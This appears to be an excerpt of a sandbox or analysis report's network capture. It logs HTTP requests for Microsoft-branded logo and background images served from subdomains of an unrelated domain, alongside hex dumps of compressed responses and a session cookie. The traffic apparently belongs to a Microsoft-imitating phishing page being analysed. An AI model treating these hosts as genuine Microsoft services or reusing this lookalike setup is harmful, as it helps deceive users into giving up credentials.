d7 83 70 fa 00 d7 e3 a4 16 84 89 3f e0 35 2f 18 52 6d 13 b8 09 62 5e 4b 83 21 8f 6a 77 63 7f 30 ae 7d f0 07 51 18 87 a3 a4 16 f1 01 f7 6f a1 91 Data Ascii: }[[H-f=='2Vb$.\{*$`y8_R{eUjjkW;;?8=m~}<>?zsz=(;qmOx~kaPhF^\|oREM-4A&~GW\|L.N(yX-Cmp?5/Rmb^K!jwc0}Qo
2024-12-04 16:37:52 UTC	16384	IN	Data Raw: 7c 73 fc f1 ec fc f4 d3 9b f3 e3 53 e7 9a 9d 1e fe ed f0 cd f9 d1 f1 c7 2f 87 3f 1f 7e 3c 77 6e d9 d9 a7 d7 6f de 1f 9c 9d 1d 7d fc c9 79 78 49 10 be 62 8a d9 2c b2 6b b7 4b c9 f4 84 0a e3 99 74 6e b9 0c 19 58 a0 eb 38 13 20 17 23 df 1a f4 12 c5 36 a9 04 87 e2 01 ea 0a 31 e1 6b 82 c2 b8 00 0d b3 57 cf 85 ae a2 8e a2 1a a1 90 66 4b 6e 64 66 50 c0 b8 2c ba 7f a5 39 33 16 79 f1 8c 65 11 01 f3 b3 67 77 55 e2 0d 0a 1b fa 7c 76 1c c5 1b a2 02 1a f7 13 8a 3b 95 41 39 d2 9f 89 16 57 46 fa fa 0f 50 4d 88 42 5f 4a 9b 26 56 87 e4 c2 1a ca c1 88 88 f4 69 21 82 9e 28 fb 27 6c 4b 46 0b aa a1 78 3e 20 96 36 41 f5 59 2d e2 03 0e 47 27 7a 3e 03 4f 26 e6 f9 ff 25 64 dc ff b5 20 31 c5 1d a2 8b 29 97 b8 92 e5 11 26 be 37 2c c8 77 04 04 a1 be 54 c4 04 a9 8c 62 47 85 7f 7f 74 Data Ascii: \|sS/?~<wno}yxIb,kKtnX8 #61kWfKndfP,93yegwU\|v;A9WFPMB_J&Vi!('lKFx> 6AY-G'z>O&%d 1)&7,wTbGt
2024-12-04 16:37:52 UTC	16384	IN	Data Raw: 88 89 a7 2d 26 3d 1c 36 55 2b 8c c9 61 58 7a a0 58 c0 8f a7 00 a2 b1 60 b3 6d c3 85 f1 f0 37 03 2e 39 87 8b 8e b8 32 c1 92 d3 39 b6 83 c5 20 4a af 0a 87 1c e0 c0 76 f6 48 49 41 cf a2 1e 9c 4c 3e b2 72 58 93 38 46 3e 94 18 bb 88 ae f0 20 50 3e 83 04 e7 5c c3 d9 00 67 f4 f8 c8 bf f4 f8 d8 e2 65 16 da 5c 2b 82 9e 7c 09 1e c1 f8 23 6b b4 4d b0 93 d6 4a a8 1f 9d 4b a4 4a 4e 78 e9 68 c0 9b a5 83 ec d8 7a d9 06 6f ce 97 45 e0 47 87 2d 2b 0d 58 23 22 65 94 f1 26 16 b9 50 3a 70 e4 14 5f 7c 31 bb fa ca ec 67 10 bb 99 7b d0 86 b3 1d d6 90 ff b6 94 a8 f1 33 95 a8 79 ed 6e 5b d4 2e a2 c6 83 d7 93 4a cc fb 19 cf b7 13 a3 9c 95 a3 1e 81 db 0f 73 99 dd 2f 97 bc 7a 4c 62 5b 85 b9 cd 7f 19 af fe 4f b5 61 2c 1a c4 fe 25 cd 18 ff 54 18 87 00 13 74 f7 02 10 ff 26 b0 55 ee eb Data Ascii: -&=6U+aXzX`m7.929 JvHIAL>rX8F> P>\ge\+\|#kMJKJNxhzoEG-+X#"e&P:p_\|1g{3yn[.Js/zLb[Oa,%Tt&U
2024-12-04 16:37:52 UTC	16384	IN	Data Raw: fb db db fc ec a4 25 22 dd de f6 1e 3f 3b f7 50 e9 3e 0d 50 25 85 da 18 90 93 47 27 53 38 e8 81 0e 27 4d 63 b4 70 9a 26 cd 57 61 11 fe 10 47 b7 70 a2 26 4d 05 3c 38 4f d5 11 70 13 4c 0c 98 5d 05 33 e3 ea 1a e0 71 23 d0 80 5d 02 c3 75 c3 9c 2c ca e3 9f 51 33 21 61 ca 6e f9 83 eb f0 ee e5 02 c0 81 41 49 dd 2b f4 96 7e 93 14 70 d4 5f d0 65 2e 2e 8d 45 74 e1 0c 19 a2 36 ad 4e fd ca 30 2f 64 81 b0 8a 2c 99 25 f5 f1 a0 80 29 ac 5f c2 09 74 29 9c 26 4b 7b 0d 47 f6 1a c6 39 6a f3 b1 50 c3 88 07 4b 8c c9 d5 00 0b 88 3f 14 59 98 e4 d0 c8 ef 17 03 cc 26 88 ee ba 18 97 f5 f8 78 63 96 fb 44 eb f7 11 3d 59 e7 8f 92 80 f4 cf 2c 36 f2 09 5e 61 d0 ea 3a 30 95 b7 bd 07 0b 34 3e 2a 21 e7 46 99 d2 84 68 d0 c4 8d d9 95 26 4c c7 74 73 86 b3 3e 13 3f 13 34 1d dc bb 98 0d 90 7d Data Ascii: %"?;P>P%G'S8'Mcp&WaGp&M<8OpL]3q#]u,Q3!anAI+~p_e..Et6N0/d,%)_t)&K{G9jPK?Y&xcD=Y,6^a:04>*!Fh&Lts>?4}
2024-12-04 16:37:52 UTC	2737	IN	Data Raw: 95 9a ac 0b cb d4 7f 41 60 6d 16 15 48 02 60 5e 3e 0b 6d 77 5f d1 a3 85 25 8e a1 da 2c d0 9f aa d4 32 54 95 a1 5e 98 7f 3b 7f f5 d2 50 a0 60 ac 9e 75 a7 4d b1 f7 e6 b1 9b 62 18 f2 dc 83 53 67 7e 51 e2 d9 f8 a1 70 07 e5 00 f5 6a 27 11 25 e0 42 c6 4d 11 31 88 61 c9 93 0d ac dc f4 65 fc 64 6a 7e b2 b0 2b d3 81 fc 8d 9b b5 04 0b e6 25 50 85 cc 62 b5 8c 32 a1 d0 2a c5 fd 82 6a b6 13 7f 62 13 e0 25 ea fe d1 b3 4c 38 c6 bf f2 8d 94 bb 7d 9d 07 d4 e6 26 e5 d4 11 ec 8b 8e 0b 82 70 11 e2 0a d3 f9 42 44 b9 46 2c 5f be 31 ed ba b1 c3 fa f7 45 fc 03 95 e9 d6 e4 ac 80 9f ca a8 cc cd 7e 0b ce ea d6 bd 35 6d af 6f 1f cd 68 d5 18 2b 86 b6 bb a5 d1 b9 89 2f e2 61 8e 51 63 f0 0f 71 0b 0d c2 e7 5a cc 1b f4 3d 28 ff 42 14 b3 7c 7c 36 de ff 3d 4c dd 6f 4b 4b 57 0d 52 ff 48 2c Data Ascii: A`mH`^>mw_%,2T^;P`uMbSg~Qpj'%BM1aedj~+%Pb2*jb%L8}&pBDF,_1E~5moh+/aQcqZ=(B\|\|6=LoKKWRH,
2024-12-04 16:37:52 UTC	16384	IN	Data Raw: c2 ec c0 4f d2 29 12 91 82 92 79 a7 95 b5 80 2b 57 0b 3e b0 80 81 75 3c 33 ce 48 34 b0 76 9e 58 f5 6a 78 8f 3b 9e a2 e7 a0 df 7c 9b 6f 12 a3 5b c2 08 f4 db ab da 52 0a 2f 82 01 56 d5 2f 3c 30 a5 5b 3a 1a a4 5e d6 02 c6 a0 55 e9 3c 2d 77 5e 1b 1a dc 20 8e 97 15 3a 29 83 d1 88 dd a4 df a0 fe 65 3a 3b 46 cc 95 f8 45 f8 e4 fe 7f 27 fd 04 c1 12 d9 3a 82 90 d0 69 c5 85 2e 4a d9 ef b2 56 b4 00 c4 78 05 8f d3 6e e0 71 6a ac 01 f0 38 db 75 1e c7 0a ab 65 c0 e3 9c 55 ca 56 f0 10 cc 3f 50 7a 25 1f f5 44 1a fe 25 80 2d 92 48 f5 fa 51 d5 77 95 a2 d2 22 ae bb bf 8f 48 e1 8c f7 3f 69 f4 4a d8 ca 79 ea ef 1f 03 d0 9f f8 07 47 45 0c 6c 76 54 28 55 dd 75 0a 0b 0a a2 2e 32 6e 99 61 4b b5 b6 11 d1 d1 eb bf e2 45 fc 23 a2 86 85 39 ea 66 97 0e 7d b5 f1 98 ce 0e 9e cb 4d ba 1e Data Ascii: O)y+W>u<3H4vXjx;\|o[R/V/<0[:^U<-w^ :)e:;FE':i.JVxnqj8ueUV?Pz%D%-HQw"H?iJyGElvT(Uu.2naKE#9f}M
2024-12-04 16:37:52 UTC	16384	IN	Data Raw: 90 50 6c c8 d7 58 12 fa ee 2d 09 7d ab bb 19 a1 2f 89 78 53 42 df 3a 7a c3 f5 cd 91 ae 91 ad 8e 86 82 df b1 6a 2a 7b c7 4f 02 36 34 df 59 e1 08 ce b8 87 55 c0 a8 0f 53 44 0d 66 ac 91 85 c2 8a 8d a1 17 3d 81 2b fa c0 f5 8c d0 f6 08 28 26 d6 47 ab a3 48 4f db c5 f6 5b 36 3c e0 26 7a 23 9c 59 df 1c a5 ad 71 1d 20 c1 a9 dc 34 ef e6 73 4f f7 d3 d6 b8 01 3d 96 d6 b8 be e9 77 67 dc 1a d7 57 0c c3 98 78 db 37 53 e6 62 b1 da 6a c4 26 ec 86 63 2e 4a 27 a6 a7 2a 76 ee 5a be a1 0f f5 9b d2 04 39 38 ca ad 32 39 bc 69 4f 8a 45 36 06 e4 36 41 69 ee 08 a5 b9 34 fa ee e4 6a 99 a7 1d 6f c4 b3 12 ed 11 78 13 7b 1d e1 29 d6 a7 8d 8c 17 ff 4d f2 a3 fa 22 bf dd a8 08 37 47 b2 15 4c b9 39 36 d0 97 77 24 f1 dc 94 68 c0 7d ae c4 68 d6 0e 84 9b 23 6a 33 ee a8 72 d3 20 5d 2a 80 9a Data Ascii: PlX-}/xSB:zj{O64YUSDf=+(&GHO[6<&z#Yq 4sO=wgWx7Sbj&c.J'vZ9829iOE66Ai4jox{)M"7GL96w$h}h#j3r ]*
2024-12-04 16:37:52 UTC	16384	IN	Data Raw: e9 f5 f1 c5 c5 f1 9f d7 af 3f bd 79 73 7a 71 fd db d9 e9 ef 97 e8 fb 96 ff e5 b1 f2 25 9e 25 a4 8a 5e c0 78 a1 d5 34 fc 4e 85 be 83 86 c3 b5 e4 8b ed 19 da b9 67 01 ba af 88 3c 30 aa ce ea 78 b5 1a a7 57 c4 1c 6a 29 5b 23 21 0e 91 46 1f 94 77 51 c0 17 da c4 fa b8 8a 64 28 ea 14 ed 23 57 d1 46 0c 74 ed 77 df 73 87 5b bc b6 c6 8d 96 da bd 43 07 e0 90 20 ad d8 bb 32 fd 6e 0f 80 10 25 b4 40 15 ac 66 0e 99 42 0b b5 38 ef 92 cc f7 bb 4b ee 93 eb a0 08 12 2f 2d c9 01 e5 c6 c2 5d 14 25 a8 00 77 93 17 fb af 61 32 53 69 e6 8d e4 24 8c db d5 2d a3 6d 1d c1 28 7b 98 72 d4 ef 3a 0a 0e ef 51 46 0e 15 16 d2 22 a1 aa c1 85 5d ba b1 b1 b4 27 f0 80 0e 5c 0f 47 e2 2b ff 65 fa 9d ac 5a d3 0b 59 11 79 7e 1a f5 98 7e 17 ce 1f cd 9a f0 5d 6a d6 a4 0f e6 ae c8 f3 d3 c0 48 67 53 Data Ascii: ?yszq%%^x4Ng<0xWj)[#!FwQd(#WFtws[C 2n%@fB8K/-]%wa2Si$-m({r:QF"]'\G+eZYy~~]jHgS
2024-12-04 16:37:52 UTC	1633	IN	Data Raw: f0 bd d2 d1 13 72 55 94 f7 78 3f b9 4a 0c e3 fd ec 2a 61 8b f7 de 95 32 6b ef d3 e2 21 cf 24 ff 95 b6 2f 7f 8a 36 d9 b2 fe b3 54 44 ef dd 6b e2 10 fd 76 13 87 df 60 dc 40 7d a9 b0 6f 90 bd 29 98 39 50 e6 df 6f e9 50 1c e9 e2 2f ad bb bf b4 ee 8a 5a 77 65 c3 a0 3f c1 f4 25 fb 4f 98 29 fc 65 58 f3 5f 64 58 d3 e9 6c 6e b2 65 0d 39 e5 98 4a 77 1b 13 69 4f 33 5b 61 2c b3 d2 0c f8 d1 26 b2 c0 b8 66 45 93 18 e1 01 c1 b7 76 5b 9b ad 8d 8e 74 c9 4b 9e 13 32 96 1a 02 f3 78 c1 4e 29 c5 20 90 15 8f aa 0d 51 54 de 7b 74 b7 91 87 8e 7c f4 25 a0 f4 64 23 a1 27 1b fa d1 92 9e 6c e6 87 cc a1 d3 39 8a 34 55 26 dd 39 f4 33 1f ca 79 ea 9d cc 25 d5 1b f0 6a 89 3a e6 62 1b 3d b6 14 cf 5f 35 4e 58 3c b8 ce 58 13 47 a7 ea 70 65 e5 7a b2 a2 8b 09 27 65 ba cb 2c b2 4c a8 64 55 d9 Data Ascii: rUx?J*a2k!$/6TDkv`@}o)9PoP/Zwe?%O)eX_dXlne9JwiO3[a,&fEv[tK2xN) QT{t\|%d#'l94U&93y%j:b=_5NX<XGpez'e,LdU

Timestamp	Bytes transferred	Direction	Data
2024-12-04 16:37:50 UTC	805	OUT	GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1 Host: 4cd0d823-53cae677.gharelokhana.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://fdgfhvcfdgfhhjh.gharelokhana.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: zQt4SK="NTNjYWU2NzctOTE3My00ZWNmLWEzYTMtYWY5ZTRiYjk3MmE5OmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
2024-12-04 16:37:51 UTC	806	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 16:37:50 GMT Content-Type: image/svg+xml Transfer-Encoding: chunked Connection: close cache-control: public, max-age=31536000 last-modified: Wed, 24 May 2023 10:11:48 GMT etag: 0x8DB5C3F4911527F x-ms-request-id: 5381a469-501e-0007-6bd0-449098000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding access-control-allow-origin: * x-azure-ref: 20241204T163750Z-15b54885d96644sphC1FRAnatc000000063000000001193q x-fd-int-roxy-purgeid: 4554691 x-cache: TCP_HIT accept-ranges: bytes content-encoding: gzip
2024-12-04 16:37:51 UTC	1442	IN	Data Raw: 35 39 62 0d 0a 1f 8b 08 00 00 00 00 00 00 ff bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12 Data Ascii: 59bWMo7+uVHJ{&v(QFaWQ\|~\|{~b{8zv8\|bgxby{x<\lSppl7o}vtrr\|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#
2024-12-04 16:37:51 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-12-04 16:37:50 UTC	804	OUT	GET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1 Host: 4cd0d823-53cae677.gharelokhana.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://fdgfhvcfdgfhhjh.gharelokhana.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: zQt4SK="NTNjYWU2NzctOTE3My00ZWNmLWEzYTMtYWY5ZTRiYjk3MmE5OmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
2024-12-04 16:37:51 UTC	806	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 16:37:51 GMT Content-Type: image/svg+xml Transfer-Encoding: chunked Connection: close cache-control: public, max-age=31536000 last-modified: Wed, 24 May 2023 10:11:46 GMT etag: 0x8DB5C3F47E260FD x-ms-request-id: 1abd9bcf-c01e-003a-2ed0-44e683000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding access-control-allow-origin: * x-azure-ref: 20241204T163751Z-15b54885d96wcw87hC1FRArvzs0000000660000000001ru9 x-fd-int-roxy-purgeid: 4554691 x-cache: TCP_HIT accept-ranges: bytes content-encoding: gzip
2024-12-04 16:37:51 UTC	680	IN	Data Raw: 32 61 31 0d 0a 1f 8b 08 00 00 00 00 00 00 ff b5 55 db 6e db 30 0c fd 15 c1 7d 69 1e ac 50 b2 ae 43 1c a0 37 6c 2f c3 0a 64 fd 80 d4 b1 13 03 ae 1d d8 6e d3 f6 eb 47 ca f6 96 0c 79 6c 10 20 e6 91 45 f2 f0 98 94 16 dd db 96 bd bf 54 75 97 46 bb be df 7f 9b cf 0f 87 03 3f 24 bc 69 b7 73 09 00 73 dc 11 b1 43 b9 e9 77 69 24 bc 84 88 ed f2 72 bb eb 11 81 43 54 94 55 95 46 75 53 e7 d1 72 b1 65 cd 7e 9d 95 fd 47 1a 71 19 b1 ac 2a f7 f1 7e 4d ae af 6d 75 7d f5 30 c3 3d 84 d9 26 8d 7e 0a 65 0c 57 4c 58 af b9 cc bc 06 9e 58 06 88 25 70 17 1b 69 b9 96 13 12 0a 04 37 2b a9 84 e1 d6 c6 02 c0 b1 c1 3f d8 b1 d4 0a cd c4 01 57 4e 0e 88 25 3e e1 a6 b3 16 d7 24 ed a6 08 63 bc 11 7d 4e f4 03 bb 9b 59 34 3f a2 97 78 c5 31 bf 13 9a 9b cc 2a c3 b5 23 76 89 16 c8 47 61 6c 39 01 Data Ascii: 2a1Un0}iPC7l/dnGyl ETuF?$issCwi$rCTUFuSre~Gq~Mmu}0=&~eWLXX%pi7+?WN%>$c}NY4?x1#vGal9
2024-12-04 16:37:51 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0